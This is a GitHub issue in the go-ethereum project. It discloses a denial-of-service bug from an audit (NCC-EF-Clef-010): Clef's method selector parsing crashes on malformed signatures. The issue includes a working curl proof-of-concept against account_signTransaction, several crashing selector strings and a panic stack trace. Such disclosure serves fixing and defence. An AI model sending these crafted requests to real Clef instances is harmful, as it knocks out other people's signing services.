### ISSUE TITLE
Clef: DoS through malicious method selector 

### ISSUE THREAD

**Issue by holiman** [ethereum/go-ethereum#17633]
Ref: NCC-EF-Clef-010

An attacker with access to Clef’s API can crash the application.The `account_signTransaction` calls `MethodSelectorToAbi` which is too lenient in the regexp, and the program can crash. 
```
curl -i -H "Content-Type: application/json" -X POST --data '{"jsonrpc":"2.0","method":"account_signTransaction","params":[{"from":"0x82A2A876D39022B3019932D30Cd9c97ad5616813","gas":"0x333","gasPrice":"0x123","nonce":"0x0","to":"0x07a565b7ed7d7a678680a4c162885bedbb695fe0", "value":"0x10", "data":"0x4401a6e40000000000000000000000000000000000000000000000000000000000000012"}, "func(uint256,uint256,[]uint256)"],"id":67}' http://localhost:8550/
```

Some examples 
```
func(uint256,uint256,[]uint256)
func(uint256,uint256,uint256,)
func(,uint256,uint256,uint256)
```

**Comment by holiman** [comment]
Stack:
```
ERROR[09-12|09:32:06.469] goroutine 16 [running]:
github.com/ethereum/go-ethereum/rpc.(*Server).serveRequest.func1(0xc4200a53b0, 0xd76440, 0xc4202c01e0)
	/home/user/go/src/github.com/ethereum/go-ethereum/rpc/server.go:132 +0xf4
panic(0xb8eb80, 0x133a000)
	/usr/local/go/src/runtime/panic.go:505 +0x229
encoding/json.(*decodeState).unmarshal.func1(0xc42034c848)
	/usr/local/go/src/encoding/json/decode.go:175 +0xd4
panic(0xb8eb80, 0x133a000)
	/usr/local/go/src/runtime/panic.go:505 +0x229
encoding/json.(*decodeState).unmarshal.func1(0xc42034c428)
	/usr/local/go/src/encoding/json/decode.go:175 +0xd4
panic(0xb8eb80, 0x133a000)
	/usr/local/go/src/runtime/panic.go:505 +0x229
github.com/ethereum/go-ethereum/accounts/abi.NewType(0xc42047c680, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc42047c680, 0x0, ...)
	/home/user/go/src/github.com/ethereum/go-ethereum/accounts/abi/type.go:106 +0x1019
github.com/ethereum/go-ethereum/accounts/abi.NewType(0xc42047c680, 0x9, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc42047c680, 0x9, ...)
	/home/user/go/src/github.com/ethereum/go-ethereum/accounts/abi/type.go:74 +0x1d2
github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON(0xc4201c8fd0, 0xc42023e452, 0x14, 0x1ae, 0x0, 0x7ba654083208)
	/home/user/go/src/github.com/ethereum/go-ethereum/accounts/abi/argument.go:48 +0x14c
encoding/json.(*decodeState).object(0xc4200e67e0, 0xbdf0c0, 0xc4201c8fd0, 0x199)
	/usr/local/go/src/encoding/json/decode.go:604 +0x1c9d
encoding/json.(*decodeState).value(0xc4200e67e0, 0xbdf0c0, 0xc4201c8fd0, 0x199)
	/usr/local/go/src/encoding/json/decode.go:408 +0x2d3
encoding/json.(*decodeState).array(0xc4200e67e0, 0xb390a0, 0xc4201c8c88, 0x197)
	/usr/local/go/src/encoding/json/decode.go:561 +0x1d0
encoding/json.(*decodeState).value(0xc4200e67e0, 0xb390a0, 0xc4201c8c88, 0x197)
	/usr/local/go/src/encoding/json/decode.go:405 +0x266
encoding/json.(*decodeState).object(0xc4200e67e0, 0xc15380, 0xc4201c8c60, 0x199)
	/usr/local/go/src/encoding/json/decode.go:754 +0x132d
encoding/json.(*decodeState).value(0xc4200e67e0, 0xc15380, 0xc4201c8c60, 0x199)
	/usr/local/go/src/encoding/json/decode.go:408 +0x2d3
encoding/json.(*decodeState).array(0xc4200e67e0, 0xb1e840, 0xc42047a820, 0x16)
	/usr/local/go/src/encoding/json/decode.go:561 +0x1d0
encoding/json.(*decodeState).value(0xc4200e67e0, 0xb1e840, 0xc42047a820, 0x16)
	/usr/local/go/src/encoding/json/decode.go:405 +0x266
encoding/json.(*decodeState).unmarshal(0xc4200e67e0, 0xb1e840, 0xc42047a820, 0x0, 0x0)

```
